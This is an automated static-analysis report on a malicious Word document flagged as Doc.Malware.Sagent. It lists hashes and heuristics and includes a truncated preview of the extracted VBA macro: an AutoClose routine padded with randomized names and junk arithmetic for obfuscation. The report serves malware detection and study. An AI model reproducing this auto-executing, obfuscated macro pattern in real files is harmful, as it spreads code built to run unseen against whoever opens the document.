Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 94cb389bb385579f…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 173.5 KB
Created: 2018-04-19 18:59:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: af92717ee57b4073702588cee5d22fbe
SHA-1: da08dbd94846fb547676c26df9b63a9fb9787cf4
SHA-256: 94cb389bb385579ffc9a5604156b0856354913641a19770c710bedeff01332d7
Risk score: 142

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing a VBA macro. The AutoClose macro, together with the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic, indicates that the macro is designed to run automatically when the document is closed. The ClamAV detection further confirms the malicious verdict. The macro's payload is obfuscated, but its execution on document close is the primary malicious behaviour.

Heuristics (5)

  • ClamAV: Doc.Malware.Sagent-6697295-0 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Sagent-6697295-0
  • VBA macros detected (medium; OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Auto_Close macro (high; OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection: see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
      • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
      • http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
      • http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 65922 bytes
SHA-256: b036953f881fe5c59825d56d4a4593b5698f00d03aca7e852a592a55261dd72a

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const REpEcoRENilUpiFaHOlYwyWiLIbOvyLIVOGm = 0
Sub AutoClose()
On Error Resume Next
Dim qoMvOMUCAMIvUJeTyvEFUsIsORytgePaSIWA(4)
Dim tYaEzBiFeWOiPVogeMDAegud(4)

If 13 = 13 + (10 * 0) Then
tYaEzBiFeWOiPVogeMDAegud(0) = CLng(9868)
End If
tYaEzBiFeWOiPVogeMDAegud(1) = Sqr(10)
tYaEzBiFeWOiPVogeMDAegud(2) = Month(98689868)
tYaEzBiFeWOiPVogeMDAegud(3) = Fix(9868.1)
Dim WyLUZYkAfmAhifyPAJorapIDEsoNUxIp(4)

If 10 = 10 + (1 * 0) Then
WyLUZYkAfmAhifyPAJorapIDEsoNUxIp(0) = CLng(7447)
End If
WyLUZYkAfmAhifyPAJorapIDEsoNUxIp(1) = Sqr(1)
WyLUZYkAfmAhifyPAJorapIDEsoNUxIp(2) = Month(74477447)
WyLUZYkAfmAhifyPAJorapIDEsoNUxIp(3) = Fix(7447.1)

Dim KiPICAWEPuQiJiYBylIRUfULIFEhOJUjaAC(4)

If 12 = 12 + (1 * 0) Then
KiPICAWEPuQiJiYBylIRUfULIFEhOJUjaAC(0) = CLng(9071)
End If
KiPICAWEPuQiJiYBylIRUfULIFEhOJUjaAC(1) = Sqr(1)
KiPICAWEPuQiJiYBylIRUfULIFEhOJUjaAC(2) = Month(90719071)
KiPICAWEPuQiJiYBylIRUfULIFEhOJUjaAC(3) = Fix(9071.1)
Dim sEVisiZeNiaYSusuiwEbeguJaiuLAjUiEpaNam(4)

If 12 = 12 + (9 * 0) Then
sEVisiZeNiaYSusuiwEbeguJaiuLAjUiEpaNam(0) = CLng(791)
End If
sEVisiZeNiaYSusuiwEbeguJaiuLAjUiEpaNam(1) = Sqr(9)
sEVisiZeNiaYSusuiwEbeguJaiuLAjUiEpaNam(2) = Month(791791)
sEVisiZeNiaYSusuiwEbeguJaiuLAjUiEpaNam(3) = Fix(791.9)
If 11 = 11 + (7 * 0) Then
qoMvOMUCAMIvUJeTyvEFUsIsORytgePaSIWA(0) = CLng(7377)
End If
Dim LUiiSEPiQufUCIdAHAaonyPoJUBodePeTuTUjA(4)

If 12 = 12 + (1 * 0) Then
LUiiSEPiQufUCIdAHAaonyPoJUBodePeTuTUjA(0) = CLng(3006)
End If
LUiiSEPiQufUCIdAHAaonyPoJUBodePeTuTUjA(1) = Sqr(1)
LUiiSEPiQufUCIdAHAaonyPoJUBodePeTuTUjA(2) = Month(30063006)
LUiiSEPiQufUCIdAHAaonyPoJUBodePeTuTUjA(3) = Fix(3006.1)
qoMvOMUCAMIvUJeTyvEFUsIsORytgePaSIWA(1) = Sqr(7)
Dim KYLYXjUNuVEHizQYDiZyaVAtOcYTotIgOq(4)

If 10 = 10 + (1 * 0) Then
KYLYXjUNuVEHizQYDiZyaVAtOcYTotIgOq(0) = CLng(6218)
End If
KYLYXjUNuVEHizQYDiZyaVAtOcYTotIgOq(1) = Sqr(1)
KYLYXjUNuVEHizQYDiZyaVAtOcYTotIgOq(2) = Month(62186218)
KYLYXjUNuVEHizQYDiZyaVAtOcYTotIgOq(3) = Fix(6218.1)
Dim KyXUpaMaDemeDobijefiRuaxeQ(4)

If 12 = 12 + (4 * 0) Then
KyXUpaMaDemeDobijefiRuaxeQ(0) = CLng(9299)
End If
KyXUpaMaDemeDobijefiRuaxeQ(1) = Sqr(4)
KyXUpaMaDemeDobijefiRuaxeQ(2) = Month(92999299)
KyXUpaMaDemeDobijefiRuaxeQ(3) = Fix(9299.4)
qoMvOMUCAMIvUJeTyvEFUsIsORytgePaSIWA(2) = Month(73777377)
Dim DenoVOWWDytQuhuLucovOmurAPOneMu(4)

If 12 = 12 + (9 * 0) Then
DenoVOWWDytQuhuLucovOmurAPOneMu(0) = CLng(1003)
End If
DenoVOWWDytQuhuLucovOmurAPOneMu(1) = Sqr(9)
DenoVOWWDytQuhuLucovOmurAPOneMu(2) = Month(10031003)
DenoVOWWDytQuhuLucovOmurAPOneMu(3) = Fix(1003.9)
qoMvOMUCAMIvUJeTyvEFUsIsORytgePaSIWA(3) = Fix(7377.7)
Dim vOwIVoFytiHIJYgOvYKNUHEBULIwXykuluS(4)

If 10 = 10 + (7 * 0) Then
vOwIVoFytiHIJYgOvYKNUHEBULIwXykuluS(0) = CLng(9000)
End If
vOwIVoFytiHIJYgOvYKNUHEBULIwXykuluS(1) = Sqr(7)
vOwIVoFytiHIJYgOvYKNUHEBULIwXykuluS(2) = Month(90009000)
vOwIVoFytiHIJYgOvYKNUHEBULIwXykuluS(3) = Fix(9000.7)
Dim aaNoVInOtEGowUVNOrUxoBBEFUKaQoKEretvE(4)

If 11 = 11 + (4 * 0) Then
aaNoVInOtEGowUVNOrUxoBBEFUKaQoKEretvE(0) = CLng(7809)
End If
aaNoVInOtEGowUVNOrUxoBBEFUKaQoKEretvE(1) = Sqr(4)
aaNoVInOtEGowUVNOrUxoBBEFUKaQoKEretvE(2) = Month(78097809)
aaNoVInOtEGowUVNOrUxoBBEFUKaQoKEretvE(3) = Fix(7809.4)
Dim QOlYVIKUPybIpnFYriOvYpUSEsohE(4)
Dim CyDexUjeVEGeCaTOssSeFErEfiUsymyQYkIf(4)

If 12 = 12 + (1 * 0) Then
CyDexUjeVEGeCaTOssSeFErEfiUsymyQYkIf(0) = CLng(4570)
End If
CyDexUjeVEGeCaTOssSeFErEfiUsymyQYkIf(1) = Sqr(1)
CyDexUjeVEGeCaTOssSeFErEfiUsymyQYkIf(2) = Month(45704570)
CyDexUjeVEGeCaTOssSeFErEfiUsymyQYkIf(3) = Fix(4570.1)
Dim htIhpAxInoqgUciQekDemefNoSIFivyGOFeZO(4)

If 10 = 10 + (2 * 0) Then
htIhpAxInoqgUciQekDemefNoSIFivyGOFeZO(0) = CLng(3872)
End If
htIhpAxInoqgUciQekDemefNoSIFivyGOFeZO(1) = Sqr(2)
htIhpAxInoqgUciQekDemefNoSIFivyGOFeZO(2) = Month(
... (truncated)